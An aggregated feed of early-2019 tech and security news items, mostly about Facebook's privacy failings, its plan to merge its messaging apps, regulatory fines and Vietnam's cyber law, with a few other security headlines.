Looking to gain more control over the company’s communication platforms and prevent users from switching to competitors, Facebook CEO Mark Zuckerberg will merge WhatsApp, Instagram and Facebook Messenger, writes The New York Times. The integration is expected to be complete by 2020 and will serve over 2.6 billion users.

“The services will continue to operate as stand-alone apps, but their underlying technical infrastructure will be unified,” the newspaper reported, citing four people involved in the effort, whom it didn’t name.

The merger, part of the tech company’s larger plan to increase revenue and advertising opportunities, raises security and privacy concerns regarding user data and how the cross-platform communication will further handle data sharing.

“This is why there should have been far more scrutiny during Facebook’s acquisitions of Instagram and WhatsApp, which now clearly seem like horizontal mergers that should have triggered antitrust scrutiny,” Representative Ro Khanna, Democrat of California, said on Twitter. “Imagine how different the world would be if Facebook had to compete with Instagram and WhatsApp.”

According to Facebook, the apps will benefit from end-to-end encryption because they want to “build the best messaging experiences we can; and people want messaging to be fast, simple, reliable and private. We’re working on making more of our messaging products end-to-end encrypted and considering ways to make it easier to reach friends and family across networks.”

However, the merger and possible lack of autonomy raise trust issues and internal conflicts, following the departure of WhatsApp and Instagram founders. Inside sources who spoke with The New York Times say the reconfiguration of all three services will be the work of thousands but the company is still figuring out all the details.  

Merging WhatsApp, Instagram, And Facebook Messenger – Zuckerberg’s Uncanny Idea

This one may not be good news for many. Zuckerberg has finally disclosed his idea of merging the three key

Merging WhatsApp, Instagram, And Facebook Messenger – Zuckerberg’s Uncanny Idea on Latest Hacking News.

Facebook: A timeline of security failings

Facebook is the world’s most popular social network, boasting 2.27 billion active users every month. That’s 2.27 billion people who trust all kinds of personal information to Facebook for safe-keeping.

Unfortunately, Facebook doesn’t have a great track record of protecting it’s users. This timeline shows some of the biggest privacy breaches since 2005.

December 2005

To help demonstrate threats to privacy caused by “over sharing” on social networks, a team of researchers publish a script that allows them to download user data from Facebook. The team manage to acquire personal data from 70,000 profiles, arguing that businesses are carrying out similar activities, stealing data without the permission of the affected users.

December 2007

Facebook releases a new product called “Beacon”, designed to help advertisers better understand their audience by tracking their movements on other websites. Beacon extends the user’s Facebook profile based on this behaviour, recording videos hired from Blockbuster Video for instance. This feature breaks the American Video Privacy Protection Act, and Facebook is forced to settle a $9.5 million class action lawsuit brought by affected users.

December 2009

Facebook publicly publish information marked private on users’ pages. A Federal Trade Commission investigation forces Facebook to apologise, and to promise improved management and protection of personal data.

June 2013

Facebook announces discovery of a bug that allows users to download contact information belonging to friends of friends – without asking permission. Official estimates suggest that as many as 6 million people have their personal information taken in this way.

February 2014

A new data-driven start-up called Cambridge Analytica asks volunteers to install a new Facebook app called thisisyourdigitallife. The app then downloads information from the user’s profile, including lists of friends, likes and some private messages.The app breaks Facebook’s terms of service, but remains in place until December 2015. By then 87 million profiles have been harvested by Cambridge Analytica, ready for use in targeting fake news stories and other marketing-related activities.

Facebook has already been fined £500,000 by the UK’s Information Commissioner for its part in the Cambridge Analytica scandal. The issue remains under investigation in the US and elsewhere.

April 2018

Facebook is forced to announce that ‘malicious actors’ have used the built-in search function to harvest the public profile data of almost their entire user base. Almost all 2 billion users have had their data collected by third parties without their permission.

June 2018

Journalists uncover “secret” agreements between Facebook and several smartphone manufacturers. In return for improving the Facebook experience on their devices, Samsung, Microsoft, Apple, Huawei, Lenovo and others have been given access to personal data belonging to the phone’s owner and their friends. Even if those friends have chosen not to share their data with third parties.

July 2018

A new bug overrides users’ block lists. For 8 days, blocked users are able to see personal information against the wishes of account holders.

August 2018

The popular data-saving app Onavo) is removed from the App Store after complaints that web activity is being collected by Facebook (Onavo’s owner), violating Apple’s privacy rules.

September 2018

A new bug in the “view as” feature allows hackers to forge authentication tokens and take control of up to 50 million user accounts.

Be careful who you trust with your data

Over the past 13 years Facebook has become a victim of its own success. With access to the personal data belonging to more than 2 billion people, the social network is a natural target for hackers and cyber criminals – but a relaxed attitude to security and privacy has only made it easier for malicious activity to thrive.

All Facebook users should regularly check their privacy and security settings to ensure they are using the tools provided to protect themselves. In the long term however, questions need to be asked whether the benefits of Facebook outweigh the obvious risks to their online safety.

The post Facebook: A timeline of security failings appeared first on Panda Security Mediacenter.

Facebook Is Shutting Down Moments

Facebook Moments, the standalone mobile app designed to let users privately share photos and videos, is shutting down next month. "Facebook confirmed the app's services will end February 25," reports TechCrunch. "Facebook decided to end support for the app, which hasn't been updated in some time, because people weren't using it." From the report: Moments, which first launched in 2015, has seen some competition from other Facebook products recently, which might have led to its demise. For instance, Facebook built out its Stories feature, which includes a direct sharing option. That option, while designed for one-offs and not whole albums, did allow users to bypass the Moments app entirely in order to privately send photos with a select friend or friends. Users also have the option to share any of their photos from the app as Albums on Facebook. If someone downloads the app to an Album, the privacy setting will default to "Only Me" but a user always has the option to share it with friends. Facebook says it will continue to incorporate options for saving memories within the Facebook app, as well. "We're ending support for the Moments app, which we originally launched as a place for people to save their photos. We know the photos people share are important to them so we will continue offering ways to save memories within the Facebook app," Rushabh Doshi, director of product management said in a statement. If you're a Moments user, you should see a message warning you about the app's demise. You can either export your photos from any device, or create a private album on your Facebook account to retrieve your photos.

Read more of this story at Slashdot.

Facebook’s Plan To Merge WhatsApp, Instagram, and Messenger Sounds a Privacy Alarm

Facebook's new plan to integrate WhatsApp, Instagram and Facebook Messenger will lead to more data about users being shared between them, a new report warns. The effort to make it easier for people to participate in conversations across its various messaging platforms sounds harmless, but it raises issues about how data will be shared across the platforms, and with third parties. The good news is that the apps will all be required to use end-to-end encryption. MIT Technology Review reports: Facebook says it wants to make it easier for people to communicate across its "ecosystem" of apps. But the real driver here is a commercial one. By making it easier to swap messages, Facebook can mine even more data to target ads with, and come up with more money-spinning services. There's another potential benefit: by integrating its messaging apps more tightly, Facebook can argue it would be harder to spin one or more of them off, as some antitrust campaigners think it should be forced to do.

Read more of this story at Slashdot.

Facebook to integrate Whatsapp, Messenger and Instagram

Don’t own any Facebook or WhatsApp account? no worries!


Mark Zuckerberg the chief executive of Facebook, plans to integrate the messaging service of various social networking platforms such as WhatsApp, Facebook Messenger, and Instagram.

This move is planned to establish his control over the company’s sprawling divisions.

It was necessary because “in past” it was clearly evident by the fact that the company’s business has been thumped by scandals.

The move is described by four people involved in the effort requires thousands of Facebook employees to reconfigure how WhatsApp, Instagram and Facebook Messenger function at their most basic levels.

Though all the three services will continue operating as stand-alone apps.

Zuckerberg also assured all of the apps to incorporate end-to-end encryption. This will protect messages from being viewed by anyone except the participants in the conversation.

After the changes take place, a Facebook user could be able to send an encrypted message to someone who has only a WhatsApp account.

Currently, it isn’t possible because the apps are separate.

But stitching the apps’ infrastructure together, Zuckerberg wants to increase the utility of the social network, keeping its billions of users highly engaged inside its ecosystem.

You can say this move is copied by another big tech company Apple.inc, as this company also had this strategy, in order to eliminate its competitors.

If users interact more frequently with Facebook’s apps, the company may also be able to build up its advertising business (which is the main source of their income) or add new services to make money, they said.

In a statement, Facebook said it wanted to “build the best messaging experiences we can; and people want messaging to be fast, simple, reliable and private.” It added: “We’re working on making more of our messaging products end-to-end encrypted and considering ways to make it easier to reach friends and family across networks.”

Summing up the whole hard effort to be taken by Facebook soon in the future.

Stay tuned for more such stories.

The post Facebook to integrate Whatsapp, Messenger and Instagram appeared first on TechWorm.

Meet the Bots That Review and Write Snippets of Facebook’s Code

Wave723 writes: To make its developers' jobs more rewarding, Facebook is now using two automated tools called Sapienz and SapFix to find and repair low-level bugs in its mobile apps. Sapienz runs the apps through many tests to figure out which actions will cause it to crash. Then, SapFix recommends a fix to developers, who review it and decide whether to accept the fix, come up with their own, or ignore the problem.

Read more of this story at Slashdot.

Advocacy Groups Are Pushing The FTC To Break Up Facebook

An anonymous reader quotes the Verge: Advocacy groups are calling for Facebook to be broken up as a result of its Cambridge Analytica scandal, subsequent privacy violations, and repeated consumer data breaches. Groups like Open Market Institute, Color of Change, and the Electronic Privacy Information Center wrote to the Federal Trade Commission Thursday requesting a major government intervention into how Facebook operates. The letter outlined several moves the FTC could take, including a multibillion-dollar fine, reforming the company's hiring practices, and most importantly, breaking up one of the most powerful social media companies for abusing its market position... According to organizations like Open Market Institute and Color of Change, Facebook should be required to give up $2 billion and divest ownership of Instagram and WhatsApp for failing to protect user data on those platforms as well. "Given that Facebook's violations are so numerous in scale, severe in nature, impactful for such a large portion of the American public and central to the company's business model, and given the company's massive size and influence over American consumers," the letter reads, "penalties and remedies that go far beyond the Commission's recent actions are called for."

Read more of this story at Slashdot.

Facebook opens up on System that ‘protects Billions’

Facebook used a blog post on Friday to describe, in detail, the systems that it uses to secure its vast social network, including custom designed tools and so-called "red team" hacks.

The post Facebook opens up on System that ‘protects Billions’ appeared first on The Security Ledger.

Related Stories

Facebook Deliberately Allowed ‘Friendly Fraud’ To Avoid Harming Revenue

An anonymous reader quotes a report from Gizmodo: Newly unsealed court documents show that Facebook was aware that underage children routinely used their parents' payment information to spend large sums of money on in-game purchases, and the company chose not to fix the problem. For years, it allowed for what it called "friendly fraud" because it feared implementing protections would harm revenue, according to the documents. In 2016, Facebook settled a class-action lawsuit brought by parents of children who were tricked into unwittingly making purchases with real money while playing free video games hosted on the social media platform. Despite its recognition of the problem, internal discussions show that Facebook decided it would be best to fight refund requests and allow the problem to persist. Documents related to the case were placed under seal because Facebook successfully argued that releasing them to the public could harm its business. Reveal, a publication run by the Center for Investigative Reporting, argued that these documents were in the public interest; last week, a judge granted Reveal's request to release the documents. On Thursday night, 135 pages from the court proceedings were unsealed, though Facebook was allowed to maintain some redactions.

Read more of this story at Slashdot.

Smashing Security #112: Payroll scams, gold coin heists, web giants spanked

Smashing Security #112: Payroll scams, gold coin heists, web giants spanked

Business email compromise evolves to target your company’s payroll, how the world’s largest gold coin was stolen from a Berlin museum, and are internet giants feeling the heat yet over data security?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by people hacker Jenny Radcliffe.

Facebook and Airbus working on solar-powered drones connectivity project

Facebook and Airbus plan to test solar-powered drones to connect remote areas to the internet

The social media giant, Facebook and aircraft manufacturer, Airbus have collaborated to work on a new drone connectivity project in Australia to beam internet access to remote areas, reports Germany’s Netzpolitik.

For those unaware, Facebook had halted its own solar-powered internet drone project, Aquila last June after years of development. Back then, the company had said that it would no longer build the drones. However, it added that it was still committed to the original goal of bringing more people online and for that it would instead depend on other companies to build aircraft.

According to the documents obtained by Netzpolitik under the Australian Freedom of Information Act, show that both the companies plan to test the solar-powered drones in Australian territory. It is learnt that Airbus met with the Australian Civil Aviation Safety Authority (CASA) between March and September last year at least 18 times to obtain approval for the tests. The company was finally given a drone operator certificate on September 19, 2018.

The documents suggest that it was planned to make flights with these drones in November and December 2018, and the tests were scheduled to take place in Wyndham airfield in Western Australia. Further, the payload for the drone was to be provided by Facebook. However, it is unclear if any flights have taken place yet. According to the minutes, delays in previous tests had prevented the tests.

The trials reportedly involved the use of Airbus’ Zephyr drone, a model that is designed for “defense, humanitarian and environmental missions.” Zephyr drone was developed by Airbus with the aim to provide internet to the Earth’s surface from about 30 kilometers high (stratosphere).

“We continue to work with partners on High Altitude Platform System (HAPS) connectivity. We don’t have further details to share at this time,” a Facebook spokesperson told NetzPolitik.

Both Facebook and Airbus have declined to provide any further details. However, it is clear that Facebook through its projects is aiming to increase internet access worldwide, particularly in developing regions such as Asia, Africa, and Latin America, and also in remote areas. It is also trying to make internet service available at much more affordable prices by using software and existing infrastructure.

The post Facebook and Airbus working on solar-powered drones connectivity project appeared first on TechWorm.

Facebook’s Plans For Space Lasers Revealed

Two new observatories are being built on Mount Wilson in California -- home to the 100-inch Hooker telescope, one of the largest aperture telescopes in the world, and CHARA array, the world's largest optical interferometer. As IEEE Spectrum reports, "they could house Facebook's first laser communications systems designed to connect to satellites in orbit." From the report: Construction permits issued by the County of Los Angeles show that a small company called PointView Tech is building two detached observatories on the mountain peak. PointView is the company that IEEE Spectrum revealed last year to be a previously unknown subsidiary of Facebook working on an experimental satellite called Athena. In April, PointView sought permission from the U.S. Federal Communications Commission to test whether E-band radio signals could "be used for the provision of fixed and mobile broadband access in unserved and underserved areas." That application was still pending at the FCC before the current U.S. federal government shutdown took effect, but it and other public documents and presentations now strongly suggest that PointView is planning to utilize laser technology, possibly both in Athena and future spacecraft. [...] Planning documents show that construction work on PointView's Mount Wilson observatories began in July and passed inspection in the middle of December. If the observatories are part of a laser satellite installation, they might use an optical ground station conceptually similar to [German company Mynaric]. This transmits its own laser beam up into the atmosphere for a drone -- or potentially a satellite -- to lock on to. Facebook and the Mount Wilson Institute didn't comment, but the report does go on to cite scientific papers authored by Facebook researchers suggesting that the company is committing resources to orbital lasers. "In a series of papers published in 2017 and 2018, engineers Raichelle Aniceto and Slaven Moro subjected multiple components, including an optical modem, to radiation similar to that experienced on orbit," reports IEEE Spectrum.

Read more of this story at Slashdot.

Russia Tries To Force Facebook, Twitter To Relocate Servers To Russia

An anonymous reader quotes a report from Ars Technica: The Russian government agency responsible for censorship on the Internet has accused Facebook and Twitter of failing to comply with a law requiring all servers that store personal data to be located in Russia. Roskomnadzor, the Russian censorship agency, "said the social-media networks hadn't submitted any formal and specific plans or submitted an acceptable explanation of when they would meet the country's requirements that all servers used to store Russians' personal data be located in Russia," The Wall Street Journal reported today. Roskomnadzor said it sent letters to Facebook and Twitter on December 17, giving them 30 days to provide "a legally valid response." With the 30 days having passed, the agency said that "Today, Roskomnadzor begins administrative proceedings against both companies." The law went into effect in September 2015, but Russia has had trouble enforcing it. "At the moment, the only tools Russia has to enforce its data rules are fines that typically only come to a few thousand dollars or blocking the offending online services, which is an option fraught with technical difficulties," a Reuters article said today. According to The Journal, "Facebook and Twitter could be fined for not providing information to the watchdog."

Read more of this story at Slashdot.

Facebook to finally answer for Cambridge Analytica scandal; record fine expected

After scandalizing the world with the Cambridge Analytics affair, Facebook is finally coming under legal fire for letting the political consultancy access personal information on 87 million users without their knowledge.

The U.S. Federal Trade Commission (FTC) seeks to slap the social network with a record fine, likely much larger than the current record — a $22.5 million fine the FTC imposed on Google in 2012 for privacy-related violations, reports the New Hampshire Union Leader.

The investigation into the scandal is not finished, but staff has been briefed about the probe and plan to issue a formal recommendation for a fine. The commissioners will then vote on it to reach a final penalty.

Facebook itself has been in talks with the FTC regarding its imminent punishment, suggesting that it has been cooperative in the process.

“The key question for the FTC is if Facebook’s business practices — and the protections and privacy controls it afforded consumers — violated requirements spelled out in a consent decree brokered by the agency the last time the tech giant deceived consumers about its practices. Only through such a finding could the FTC levy a fine,” the report notes.

Cambridge Analytica, as readers will remember, had ties to Donald Trump’s U.S. presidential campaign and is believed to have helped him beat adversary Hilary Clinton by using harvested Facebook data to better target voters with political messages.

Since the scandal, Facebook has stumbled a few more times, and will likely incur several more penalties under different legislations.

New research by Accenture indicates that cybercrime will cost businesses around 5 trillion dollars over the next five years.

Facebook Launches a Petition Feature

Tomorrow Facebook will encounter a slew of fresh complexities with the launch of Community Actions, its News Feed petition feature. From a report: Community Actions could unite neighbors to request change from their local and national elected officials and government agencies. But it could also provide vocal interest groups a bully pulpit from which to pressure politicians and bureaucrats with their fringe agendas. Community Actions embodies the central challenge facing Facebook. Every tool it designs for positive expression and connectivity can be subverted for polarization and misinformation. Facebook's membership has swelled into such a ripe target for exploitation that it draws out the worst of humanity. You can imagine misuses like "Crack down on [minority group]" that are offensive or even dangerous but some see as legitimate. The question is whether Facebook puts in the forethought and aftercare to safeguard its new tools with proper policy and moderation. Otherwise each new feature is another liability. Community Actions start to roll out to the US tomorrow after several weeks of testing in a couple of markets. Users can add a title, description, and image to their Community Action, and tag relevant government agencies and officials who'll be notified. The goal is to make the Community Action go viral and get people to hit the "Support" button. Community Actions have their own discussion feed where people can leave comments, create fundraisers, and organize Facebook Events or Call Your Rep campaigns. Facebook displays the numbers of supporters behind a Community Action, but you'll only be able to see the names of those you're friends with or that are Pages or public figures.

Read more of this story at Slashdot.

Facebook is secretly working on a new meme hub app ‘LOL’ for teens

Facebook secretly testing a meme hub app called ‘LOL’ to win teens over

Facebook is trying every possible means to woo back its lost audience of teenage smartphone users from other social platforms such as Snapchat, Instagram, YouTube, and TikTok.

After working on dating app, the social media giant is now developing another app dubbed as ‘LOL’. This new platform is designed as a “special feed of funny videos and GIF-like clips” using content “pulled from News Feed posts by top meme Pages on Facebook,” according to a new report from TechCrunch.

“We are running a small scale test and the concept is in the early stages right now,” a Facebook spokesperson confirmed to TechCrunch.

The content will be divided into categories like “For You”, “Animals”, “Fails” and “Pranks”. Further, users will be able to choose from three reactions: “Funny,” “Alright,” or “Not Funny” that would appear under each meme.

Currently, around 100 high school students in the U.S. with their parents’ consent are testing the LOL app, and are apparently giving their feedback to Facebook engineers.

“‘LOL’ is currently in private beta with around 100 high school students who signed non-disclosure agreements with parental consent to do focus groups and one-on-one testing with Facebook staff,” said the report.

Those testing private beta say that LOL is slightly “cringey” and that it feels like Facebook is trying unsuccessfully to stay young.

According to TechCrunch, LOL is presently being tested as a replacement for Facebook Watch. It is currently unclear if “LOL” will become a standalone app or be available in the main Facebook app.

This is not the first time that Facebook has tried to lure the younger audience with its apps. In 2014, Facebook had launched a Snapchat clone app ‘Slingshot’, which was has since been abandoned. In late 2018, the company introduced ‘Lasso’, a stand-alone music app to rival popular short-video social network, TikTok, which is apparently still working.

The post Facebook is secretly working on a new meme hub app ‘LOL’ for teens appeared first on TechWorm.

Mark Zuckerberg’s Mentor ‘Shocked and Disappointed’ — But He Has a Plan

Early Facebook investor Roger McNamee published a scathing 3,000-word article adapted from his new book Zucked: Waking Up to the Facebook Catastrophe. Here's just one example of what's left him "shocked and disappointed": Facebook (along with Google and Twitter) has undercut the free press from two directions: it has eroded the economics of journalism and then overwhelmed it with disinformation. On Facebook, information and disinformation look the same; the only difference is that disinformation generates more revenue, so it gets better treatment.... At Facebook's scale -- or Google's -- there is no way to avoid influencing the lives of users and the future of nations. Recent history suggests that the threat to democracy is real. The efforts to date by Facebook, Google and Twitter to protect future elections may be sincere, but there is no reason to think they will do anything more than start a game of whack-a-mole with those who choose to interfere. Only fundamental changes to business models can reduce the risk to democracy. Google and Facebook "are artificially profitable because they do not pay for the damage they cause," McNamee argues, adding that some medical researchers "have raised alarms noting that we have allowed unsupervised psychological experiments on millions of people." But what's unique is he's offering specific suggestions to fix it. "I want to set limits on the markets in which monopoly-class players like Facebook, Google and Amazon can operate. The economy would benefit from breaking them up. A first step would be to prevent acquisitions, as well as cross subsidies and data sharing among products within each platform." "Another important regulatory opportunity is data portability, such that users can move everything of value from one platform to another. This would help enable startups to overcome an otherwise insurmountable barrier to adoption." "Given that social media is practically a public utility, I think it is worth considering more aggressive strategies, including government subsidies." "There need to be versions of Facebook News Feed and all search results that are free of manipulation." "I would like to address privacy with a new model of authentication for website access that permits websites to gather only the minimum amount of data required for each transaction.... it would store private data on the device, not in the cloud. Apple has embraced this model, offering its customers valuable privacy and security advantages over Android." "No one should be able to use a user's data in any way without explicit, prior consent. Third-party audits of algorithms, comparable to what exists now for financial statements, would create the transparency necessary to limit undesirable consequences." "There should be limits on what kind of data can be collected, such that users can limit data collection or choose privacy. This needs to be done immediately, before new products like Alexa and Google Home reach mass adoption."

Read more of this story at Slashdot.

Twitter bug exposed private tweets of Android users to public for years

By Carolina

A security bug in Twitter exposed private tweets of users to the public. The flaw only affected Android users of the Twitter app while iPhone users were not affected. According to Twitter, private tweets of users from November 3, 2014, to January 14, 2019, were exposed. Although the company did not say how many people were affected […]

This is a post from HackRead.com Read the original post: Twitter bug exposed private tweets of Android users to public for years

Lawsuit Reveals How Facebook Profited Off Confused Children: Report

Documents outlining how Facebook profited off children are expected to be made public soon, according to Reveal News of the Center for Investigative Reporting (CIR), who requested the documents. From a report: In a report about the trove of previously-sealed documents, Reveal News explains that Facebook has previously faced lawsuits for failing to refund charges made by children playing games on Facebook. According to Reveal, the children did not know that their parent's credit card was stored on the platform when they clicked "buy," and in some cases, hundreds or even thousands of dollars were spent. In one case, the plaintiff, who is a child, spent several hundreds of dollars in just a few weeks. According to the report, more documents show "widespread confusion by children and their parents, who didn't understand Facebook continued to charge them as they played games."

Read more of this story at Slashdot.

Facebook open sources Spectrum for efficient uploading of images

Facebook launches open-sourced Spectrum for better mobile image production

Facebook has officially released an open source tool to the developer community to make the process of uploading images more efficient.

Dubbed as “Spectrum”, this tool is a cross-platform image transcoding library that can easily be integrated into an Android or iOS project to efficiently perform common image operations. It aims to improve the reliability and quality of image uploads while reducing image uploading time and mobile data consumption.

“As modern smartphones capture high-resolution images, the large file size makes uploads unreliable on some mobile networks. Sending it at full resolution is often wasteful, as the content delivery network (CDN) will resize the image for the recipient anyway,” said Facebook mobile software engineer Daniel Hugenroth.

“Resizing the image on the sender’s device reduces the bandwidth required to send the image. As a result, the entire pipeline has minimal payload overhead, improving the end-to-end experience. The remaining challenge is how to maintain image quality while benefiting from the smaller file.”

Spectrum uses a “declarative” API that allows developers to focus on the desired output properties instead of the individual steps. It prefers a lossless operation for cropping and rotating JPEG images, while in resizing it “optimizes the interplay between decoder sampling and pixel-perfect resizing.” It also uses C/C++ code for higher performance with Java and Objective-C wrapper APIs to make development easier.

Spectrum integrates with native image compression libraries, including MozJpeg, that allows to control encoding parameters beyond the general-purpose platform APIs. It allows developers to utilize computationally intensive encoding, which requires more processing time but significantly reduces the file size. Additionally, it enables control over more advanced parameters such as chroma subsampling to improve the quality of images with sharp edges and illustrations.

“The consistent API makes these features accessible to developers who are not image experts,” Hugenroth added.

“We hope Spectrum will benefit developers in the same way it has helped Facebook create a better image production experience. In our apps, Spectrum has improved the reliability and quality of image uploads at large scale across our apps. The default integration with Mozilla JPEG allows a reduction of up to 15 percent in upload file size compared with a baseline encoder. We are excited to see how the community uses the Spectrum 1.0.0 library to improve the photo experiences in applications.”

The open source project ‘Spectrum 1.0.0’ is now available on GitHub code repository.

The post Facebook open sources Spectrum for efficient uploading of images appeared first on TechWorm.

Most Facebook users aren’t aware that Facebook tracks their interests

Too many Facebook users aren’t aware that the company uses the information provided by them and their actions on the platform and outside of it to create a list of their traits and interests, which is then used by to target them with relevant ads. The survey According to the results of a new Pew Research Center surveys, which polled a representative sample of US-based, adult Facebook users: 88% discovered that the site had generated … More

The post Most Facebook users aren’t aware that Facebook tracks their interests appeared first on Help Net Security.

WhatsApp – Are You Getting Someone Elses Messages?

WhatsApp is one of the biggest message platforms in the world. It has always prided itself on being reliable and

WhatsApp – Are You Getting Someone Elses Messages? on Latest Hacking News.

Research Suggests Older People More Likely to Share Fake News

When you think about fake news, it might conjure up images of the 2016 US Presidential campaign. It was thought

Research Suggests Older People More Likely to Share Fake News on Latest Hacking News.

The 10 year challenge is taking the Internet by storm

The first few days of the new 2019 started with a new social media craze that is making its way to the timelines of hundreds of millions of people across all major social media networks – the 10 year challenge. Unless you are one of the few people who does not use social media, you most likely have already noticed the new viral trend that consists of side-by-side memes of people from ten years ago and today. Millions of people have already participated, and a whole list of celebrities have shared their before-and-after memes with their followers. The challenge is about to blow out of proportion as more and more people are entering it by the second.

What exactly is the 10 year challenge?

The challenge consists of people posting then-and-now images of themselves. The old photos go as far as 2008 and are usually compared to recent photos uploaded to social media. The viral social media trend come in many forms. Some of the popular hashtags that reflect the hottest social media challenge are #10YearChallenge, #GlowUpChallenge, #2009vs2019, #HowHardDidAgingHitYou, and #agechallenge. The challenge is currently making its way through all major social media platforms including Facebook, Twitter, Instagram, etc.

Who is behind the challenge?

Currently, it is unknown if someone started the challenge intentionally. Multiple reporters have been speculating that this might be Facebook’s way to collect data that could be mined to train facial recognition algorithms on age progression and age recognition. Nicholas Thompson, the editor of Wired, succeeded in muddying the waters by tweeting “Let’s say you wanted to train a facial recognition algorithm on aging. What would do? Maybe start a meme like #10yearchallenge”. While this is a question that certainly gives you food for thought, it is still unknown if the challenge was ignited intentionally by a private company and if yes, what might have been its motives to do it.

Why did the 10 year challenge start now?

When Facebook was founded in 2004, the platform’s initial purpose was to be used as a networking tool for students in Ivy League universities. However, a few years after its launch, Facebook become open for everyone. Roughly 10 years ago, in 2009, Facebook started adding hundreds of millions of new users every day. Some say that the 10 year challenge is getting viral right now because of Facebook’s memories tool that brings images from the past to users’ timelines. Social media users are so fascinated by the difference between the 10 year old “memory” they see, and their current profile picture, that they decide to share it with friends and family.

Which celebrities have participated in the 10 year challenge?

The viral trend got popularized by some high profile celebrities such as Reese Witherspoon, Ellen DeGeneres, Nicki Minaj, Trevor Noah, Caitlyn Jenner, and Tyra Banks. Most of them jumped on the bandwagon to simply show how well they still look and how they haven’t aged at all.

How to enter the 10 year challenge?

If you want to enter the viral challenge all you have to do is dig out a 10 year old photo of yourself and splice it with a current one. The result should be a side-by-side photograph of yourself ten years apart similar to the before-after diet advertisements that we all see all the time on social media. If you want your side-by-side photo to get noticed, you can post it on any social media channels with the following hashtags #10YearChallenge, #GlowUpChallenge, #2009vs2019, #2008vs2018, #HowHardDidAgingHitYou, and #agechallenge.

Download Panda FREE VPN

The post The 10 year challenge is taking the Internet by storm appeared first on Panda Security Mediacenter.

Illinois BIPA Suit Dismissed for Lack of Article III Standing

As we previously reported in February 2017, an Illinois federal judge denied a motion to dismiss two complaints brought under the Illinois Biometric Information Privacy Act, 740 ILCS 14 (“BIPA”) by individuals who alleged that Google captured, without plaintiff’s consent, biometric data from facial scans of images that were uploaded onto Google Photos. The cases subsequently were consolidated, and on December 29, 2018, the Northern District of Illinois dismissed the case on standing grounds, finding that despite the existence of statutory standing under BIPA, neither plaintiff had claimed any injury that would support Article III standing.

In Spokeo, Inc. v. Robins, the Supreme Court held that Article III standing requires a concrete and particularized injury even in the context of a statutory violation. The court here likewise concluded that although the plaintiffs in this case had statutory standing under BIPA, the procedural, statutory violation alone was insufficient in satisfying the standing requirement.

In asking whether either plaintiff adequately alleged such requisite injury, the court considered Google’s collection and retention of the facial scans. With respect to the retention issue, the court followed the 7th Circuit ruling in Gubala v. Time Warner Cable, Inc. that, while in violation of the Cable Communications Policy Act, the retention of individual information alone, without information disclosure or sufficient risk of information disclosure, did not confer Article III standing.

Regarding collection, the court considered (1) Patel v. Facebook Inc., a similar case brought in the Northern District of California that was not dismissed, involving a plaintiff who alleged that Facebook’s use of facial recognition for tagging photos violated BIPA’s notice and consent requirements; and (2) common law tort analogues. The Illinois court (1) declined to follow the California court, reasoning that there was an insufficient showing that the Illinois legislature intended to create a cause of action that would arise from the violation of BIPA’s notice and consent requirements alone; and (2) found that the two common law tort analogues bearing the closest relationship to the alleged injury, intrusion upon seclusion and misappropriation, were not appropriate in this case because the harms alleged by the plaintiffs were incompatible with or did not align with the harms of the tort of intrusion upon seclusion or misappropriation. Specifically, the templates that Google created were based on faces, which are regularly publicly exposed, and were not made publicly available or used by Google for commercial purposes. As such, the court dismissed the claim, holding that neither plaintiff in this case had claimed an injury that would support Article III standing.

A number of BIPA actions remain pending in federal and state courts. It remains to be seen whether other courts will agree with the Northern District of Illinois regarding the unavailability of BIPA claims based solely on procedural violations of the act.

A week in security (January 7 – 13)

Last week on the Malwarebytes Labs blog, we took a look at the Ryuk ransomware attack causing trouble over the holidays, as well as a ransom threat for an Irish transportation company. We explored the realm of SSN scams, and looked at what happens when an early warning system is attacked.

Other cybersecurity news

  • Password reuse problems. Multiple Reddit accounts reported being locked out after site admins blamed “password reuse” for the issue. (Source: The Register)
  • 85 rogue apps pulled from Play Store. Sadly, not before some 9 million downloads had already taken place. (Source: Trend Micro)
  • Home router risk. It seems many home routers aren’t doing enough in the fight against hackers. (Source: Help Net Security)
  • Deletion not allowed. Some people aren’t happy they can’t remove Facebook from their Samsung phones. (Source: Bloomberg)
  • Takedown: How a system admin brought down the notorious “El Chapo.” (Source: USA Today)
  • 2FA under fire. A new pentest tool called Mantis can be used to assist in the phishing of OTP (one time password) codes. (Source: Naked Security) 
  • Facebook falls foul of new security laws in Vietnam. New rules have brought a spot of bother for Facebook, accused of not removing certain types of content and handing over data related to “fraudulent accounts.” (source: Vietnam News)
  • Trading site has leak issue. A user on the newly set up trading platform was able to grab a lot of potentially problematic snippets, including authentication tokens and password reset links. (source: Ars Technica)
  • Local risk to card details. A researcher discovered payment info was being stored locally on machines, potentially exposing them to anyone with physical access. (Source: Hacker One) 
  • Facebook exec swatted. The dangerous “gag” of sending armed law enforcement to an address ends up causing problems for a “cybersecurity executive,” after bogus calls claimed they had “pipe bombs all over the place.” (source: PA Daily post)

Stay safe, everyone!

The post A week in security (January 7 – 13) appeared first on Malwarebytes Labs.

Smashing Security #110: What? You can get paid to leave Facebook?

Smashing Security #110: What? You can get paid to leave Facebook?

Twitter and the not-so-ethical hacking of celebrity accounts, study discovers how you can pay someone to quit Facebook for a year, and the millions of dollars you can make from uncovering software vulnerabilities.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Maria Varmazis.

Facebook Accused of Violating Vietnam’s Cyber Law

Vietnam’s controversial cybersecurity law that tightens government control of the online environment just came into effect on Jan. 1 and it’s already claiming its first victim, writes the Financial Times.

On Tuesday, the communist country accused Facebook of not complying with its new law by refusing to immediately delete fan pages with content the government considers defamatory. According to Vietnam’s Authority of Broadcasting and Electronic Information (ABEI), Vietnamese account holders freely published “slanderous content, anti-government sentiment and libel and defamation of individuals, organizations and state agencies.”

The cybersecurity law, passed in June 2018, forms part of Vietnam’s strategy to tighten media control and restrict free speech online.

“This decision has potentially devastating consequences for freedom of expression in Vietnam,” Amnesty International stated at the time. “In the country’s deeply repressive climate, the online space was a relative refuge where people could go to share ideas and opinions with less fear of censure by the authorities.”

Citing a Vietnamese market research report, the government body accuses Facebook of allowing advertising for scams and fake or illegal products. “The Vietnamese report claimed some $235 million was spent on Facebook ads in 2018, with $152.1 million going to Google,” writes TechCrunch.

As a result, Vietnam wants to penalize Facebook by taxing advertising revenue.

